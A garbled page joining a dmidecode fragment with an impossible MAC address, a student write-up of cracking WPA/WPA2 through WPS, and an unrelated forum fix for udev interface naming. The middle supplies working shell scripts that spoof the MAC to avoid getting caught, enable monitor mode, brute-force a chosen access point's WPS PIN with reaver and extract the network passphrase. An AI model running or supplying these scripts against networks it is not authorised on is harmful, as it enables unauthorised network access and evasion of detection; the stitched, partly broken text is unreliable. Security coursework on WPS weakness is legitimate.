root@server # dmidecode | grep -i mac
MCE (Machine check exception)
MCA (Machine check architecture)
HP BIOS NIC PCI and MAC Information
NIC 1: PCI device 03:00.0, MAC address 1C:69:F5:4B:24:Y8
NIC 2: PCI device 03:00.1, MAC address 1C:69:F5:4B:24:Y8
HP BIOS iSCSI NIC PCI and MAC Information.

Sadly, I can't remember what the command is to find the previous entry, but... Hope this helps, and if you need to find the previous entry, I hope this inspires you enough to google and figure it out!

Edit: THANKS ALL! There is some GREAT info in the comments; I really appreciate everyone's contribution, and I'm learning even more.
Disclaimer: This is for educational and personal use only. This was originally done as an assignment for SEC701 – Ethical Hacking. I do not condone potential illegal uses of this information. However, it is perfectly legal to “hack” your own equipment or equipment you are authorized to administer. If you use this for malicious purposes, it is not my fault.
Background
WPS (Wi-Fi Protected Setup) is a standard intended to make joining WPA/WPA2 networks easier by means of an 8-digit PIN. In practice it weakens WPA/WPA2: the PIN can be brute forced (the eighth digit is only a checksum, and the access point confirms the first and second halves of the PIN separately, so at most about 11,000 guesses are needed rather than 10^8), and once it has been recovered the attacker can have the router/access point hand over its own passphrase or PSK (pre-shared key). The tools used in this attack are as follows, all included in Kali Linux:
macchanger (for MAC spoofing, not directly connected to the attack)
airmon-ng
wash
reaver
The video used as a basis for this attack (and shown for demonstration in class) can be found here:
Part 1 – MAC Spoofing
While not essential to the attack itself, to simulate doing this for real we are going to spoof our MAC address to limit the potential for getting caught. This takes only a few steps. For demonstration purposes, show the current MAC address:
The first step is to bring the interface down and stop NetworkManager (otherwise it may reset the address behind our back), by issuing the following commands:
Now generate a random MAC address using macchanger. There are two options here: -r, which generates a fully random MAC, or -a, which generates a random MAC of the same manufacturer kind (if it can determine the manufacturer). In my case it couldn't, so the output is the same as with -r.
Finally, bring the interface up and note that the MAC has changed (the previous step already prints the original MAC and the new one).
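Part 1 as a single script, added here as an example; these are not the commands from the original post (which are missing from this copy). It assumes the wireless interface is wlan0 and that NetworkManager is the service to stop; on the older Kali this post was written for, ifconfig wlan0 down and service network-manager stop do the same jobs as the ip and systemctl calls. The mac_kind helper tells a randomised address from the burned-in vendor one just by looking at the first octet: a spoofed MAC should be unicast and locally administered (second hex digit 2, 6, A or E), which is what macchanger's random modes produce unless you ask for a burned-in address with -b.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: Part 1 (MAC spoofing) as one script.
# Assumptions: wireless interface wlan0, NetworkManager as the service to stop.
IFACE="${IFACE:-wlan0}"

# Current hardware address of an interface, as the kernel reports it.
current_mac() { cat "/sys/class/net/$1/address"; }

# Print a random unicast, locally administered MAC (what a spoofed address
# should look like): bit 0 of the first octet clear (unicast), bit 1 set (local).
random_mac() {
  local b
  b=$(( (RANDOM & 0xFC) | 0x02 ))
  printf '%02x:%02x:%02x:%02x:%02x:%02x\n' "$b" \
    $(( RANDOM % 256 )) $(( RANDOM % 256 )) $(( RANDOM % 256 )) \
    $(( RANDOM % 256 )) $(( RANDOM % 256 ))
}

# Classify a MAC: "local" (unicast, locally administered), "global"
# (unicast, burned-in vendor address), "multicast", or "invalid".
mac_kind() {
  local mac=$1 first
  local re='^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
  [[ $mac =~ $re ]] || { echo invalid; return; }
  first=$(( 16#${mac:0:2} ))
  if (( first & 0x01 )); then echo multicast
  elif (( first & 0x02 )); then echo local
  else echo global
  fi
}

# Bring the interface down, stop NetworkManager (it would otherwise reset the
# address), randomise, bring it back up, and report old/new.
spoof_mac() {
  local before after
  before=$(current_mac "$IFACE")
  ip link set dev "$IFACE" down                   # older Kali: ifconfig $IFACE down
  systemctl stop NetworkManager 2>/dev/null || service network-manager stop
  macchanger -r "$IFACE"                          # or: ip link set dev "$IFACE" address "$(random_mac)"
  ip link set dev "$IFACE" up
  after=$(current_mac "$IFACE")
  printf 'old %s (%s)\nnew %s (%s)\n' \
    "$before" "$(mac_kind "$before")" "$after" "$(mac_kind "$after")"
}

# Only touch the interface when run explicitly (as root): ./spoof.sh run
if [ "${1:-}" = run ]; then spoof_mac; fi
```

Run it as root with the argument run; without an argument it only defines the functions, so you can source it and call mac_kind on any address you are about to use.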
Part 2 – Hacking WPS
Hacking WPS was actually less work than hacking WEP, though it took a lot longer. The first thing to do is run airmon-ng without options to make sure the wireless interface is detected properly.
Next, issue the command again with the interface name to start monitoring.
Issue the wash command to scan for WPS-enabled access points in the area.
The output should look something like the following.
Now run reaver with the MAC address (BSSID) of the access point as an argument, obtained from the wash output in the previous step. This step can take anywhere from 4 to 20+ hours; in my case it took about 6 hours to successfully crack the WPS PIN.
Once you have the PIN, run reaver again with the PIN as an argument and it will return the PSK fairly quickly.
Which resulted in the following output.
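Two things the text describes, as an added example rather than the author's commands: the check-digit rule that shrinks the WPS PIN space (see Background), and the airmon-ng / wash / reaver sequence of Part 2 wrapped in functions. Assumptions not taken from the post: the managed interface is wlan0, the monitor interface created by this era's airmon-ng is mon0, and reaver 1.4's -i/-b/-c/-p/-vv flags. The checksum function follows the WPS specification's check-digit rule; reaver implements the same rule to skip PINs with a bad check digit.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: the WPS PIN check digit that makes the
# PIN brute-forceable, plus Part 2 (airmon-ng / wash / reaver) wrapped in functions.
# Assumptions: wlan0 as the managed interface, mon0 as the monitor interface that
# this era's airmon-ng creates, and reaver 1.4 command-line flags.
IFACE="${IFACE:-wlan0}"
MON="${MON:-mon0}"

# WPS check digit over the first 7 PIN digits (weights 3,1,3,1,... from the right),
# as specified by Wi-Fi Protected Setup.
wps_checksum() {
  local pin=$(( 10#$1 )) accum=0     # 10# forces decimal even with leading zeros
  while (( pin > 0 )); do
    accum=$(( accum + 3 * (pin % 10) )); pin=$(( pin / 10 ))
    accum=$(( accum + pin % 10 ));       pin=$(( pin / 10 ))
  done
  echo $(( (10 - accum % 10) % 10 ))
}

# Print "valid" if an 8-digit PIN has the right check digit, else "invalid".
wps_pin_is_valid() {
  local pin=$1
  [[ $pin =~ ^[0-9]{8}$ ]] || { echo invalid; return; }
  if [ "$(wps_checksum "${pin:0:7}")" = "${pin:7:1}" ]; then echo valid; else echo invalid; fi
}

# Worst-case number of guesses. The check digit leaves 10^7 PINs, and because the
# AP reports failure of the first 4 digits before the last 4 are ever checked,
# an attacker tries at most 10^4 first halves + 10^3 second halves.
wps_max_guesses() { echo $(( 10**4 + 10**3 )); }

# Step 1: check the card is detected, then put it in monitor mode (creates mon0).
start_monitor() { airmon-ng; airmon-ng start "$IFACE"; }

# Step 2: list nearby APs with WPS enabled; note BSSID, channel and the "WPS Locked" column.
scan_wps() { wash -i "$MON"; }

# Step 3: brute-force the PIN. Reaver saves progress per BSSID, so an interrupted run resumes.
crack_pin() { reaver -i "$MON" -b "$1" -c "$2" -vv; }       # $1 BSSID, $2 channel from wash

# Step 4: with the PIN known, a single exchange returns the WPA/WPA2 PSK.
recover_psk() {
  [ "$(wps_pin_is_valid "$2")" = valid ] || { echo "bad PIN check digit: $2" >&2; return 1; }
  reaver -i "$MON" -b "$1" -p "$2" -vv
}

# Usage: ./wps.sh monitor | scan | crack <BSSID> <channel> | psk <BSSID> <PIN>
case "${1:-}" in
  monitor) start_monitor ;;
  scan)    scan_wps ;;
  crack)   crack_pin "$2" "$3" ;;
  psk)     recover_psk "$2" "$3" ;;
esac
```

The well-known test PIN 12345670 passes the check (the digits 1234567 sum to 60 under the 3,1 weighting, so the check digit is 0), while 12345671 does not; the validity check in recover_psk stops you from spending a reaver run on a mistyped PIN.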
Conclusions
The attack method used to compromise WPA/WPA2 by way of hacking WPS was in my opinion much easier than that used to hack WEP in a previous demonstration this semester. While WEP took about 30 minutes to crack, hacking WPS took approximately 6 hours. After some very brief research online I discovered that this process can take anywhere from 4 to 30 hours. You would think the length of time required would be somewhat of a deterrent; however, once WPS has been compromised it opens up a permanent vulnerability (unless WPS is disabled), because the same PIN can be used to repeat the process after the administrator of the access point changes the pre-shared key. To further complicate matters, on most consumer routers the WPS PIN is fixed in firmware and cannot be changed. Which leads to another problem: some access points do not actually disable WPS even when you have disabled it in the device's settings. This has been patched by many of the leading manufacturers, but it is up to the administrator responsible for the access point to check whether this is an issue for their particular hardware.
The original problem description and solution can be found in this forum thread.
Failed To Retrieve A Mac Address For Interface 'mon0' Reaver
Problem: Every time the command “airmon-ng start wifi0 x” is run a new interface is created, as it should be, but there were two problems. The first is that each time airmon-ng is run on wifi0 the interface number on ath increases: the first time it is ath1, the second ath2, the third ath3, and so on. This continues, so in a short period of time it is up to ath56 and still climbing. Unloading the madwifi-ng driver or rebooting the system has no effect, and the number of the interface created by airmon-ng continues to increase.
The second problem is that if you run airmon-ng on wifi0, the athXX it creates does not show as being in Monitor mode, even though it is. This can be confirmed via iwconfig.
All these problems relate to how udev assigns interface names. The answer is in this ticket: http://madwifi-project.org/ticket/972#comment:12 Thanks to lucida. The source of the problem is the udev persistent net rules generator.
Each distro is different, so here is a solution specifically for Gentoo. You should be able to adapt it to your particular distribution.
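An added, distro-neutral diagnostic for the symptom described in the thread; this is not the Gentoo solution the thread goes on to give, and the rules-file contents and iwconfig excerpt below are constructed samples with fabricated MAC addresses. udev's persistent-net generator writes one NAME="athN" rule for every interface MAC it has not seen before, and those rules survive driver reloads and reboots, which is why the index keeps climbing. The rules path is an assumption (/etc/udev/rules.d/70-persistent-net.rules on Debian-style systems; Gentoo's may differ).

```shell
#!/usr/bin/env bash
# Added example, not from the original thread and not the Gentoo fix it refers to:
# a distro-neutral way to see the symptom described above. udev's persistent-net
# generator writes one NAME="athN" rule per new MAC it sees, so every airmon-ng run
# leaves a rule behind and the next VAP gets N+1. The rules file path and the
# sample contents below are constructed for illustration (fabricated MACs).
RULES_FILE="${RULES_FILE:-/etc/udev/rules.d/70-persistent-net.rules}"

# Constructed example of an accumulated rules file (ATTR{type} 1 = Ethernet-like
# VAP, 803 = radiotap monitor interface such as airmon-ng creates).
SAMPLE_RULES='# PCI device 0x168c:0x0013 (ath_pci)
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="00:11:22:33:44:55", ATTR{type}=="1", KERNEL=="ath*", NAME="ath1"
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="06:11:22:33:44:55", ATTR{type}=="803", KERNEL=="ath*", NAME="ath2"
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="0a:11:22:33:44:55", ATTR{type}=="803", KERNEL=="ath*", NAME="ath3"'

# Print the athN names a rules file pins, one per line, in numeric order.
pinned_ath_names() {
  printf '%s\n' "$1" | sed -n 's/.*NAME="ath\([0-9]*\)".*/\1/p' | sort -n | sed 's/^/ath/'
}

# Number of athN rules that have accumulated (0 for an empty file).
count_ath_rules() { pinned_ath_names "$1" | wc -l | tr -d ' '; }

# The name udev will hand the next VAP: one past the highest pinned index.
next_ath_name() {
  local last
  last=$(pinned_ath_names "$1" | tail -n 1 | tr -dc '0-9')
  echo "ath$(( ${last:-0} + 1 ))"
}

# Monitor mode is real even when the tool output does not say so; ask the kernel.
# Takes iwconfig output and an interface name, prints its Mode: value (e.g. Monitor).
iw_mode() {
  printf '%s\n' "$1" | awk -v ifc="$2" '
    $1 == ifc { found = 1 }
    found && match($0, /Mode:[A-Za-z-]+/) { print substr($0, RSTART + 5, RLENGTH - 5); exit }
  '
}

# Constructed iwconfig excerpt for the check above.
SAMPLE_IWCONFIG='ath3      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.437 GHz  Access Point: 00:11:22:33:44:55
          Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=1/1'

# Run against the live system: ./athcheck.sh check [interface]
if [ "${1:-}" = check ]; then
  rules=$(cat "$RULES_FILE" 2>/dev/null || true)
  echo "accumulated ath rules: $(count_ath_rules "$rules")"
  echo "next VAP would be:     $(next_ath_name "$rules")"
  echo "${2:-ath1} mode:         $(iw_mode "$(iwconfig 2>/dev/null)" "${2:-ath1}")"
fi
```

On the sample the three pinned names mean the next airmon-ng run would produce ath4, and iw_mode confirms ath3 really is in Monitor mode regardless of what the tool printed; on a live box the count shows how many stale rules the generator has left behind.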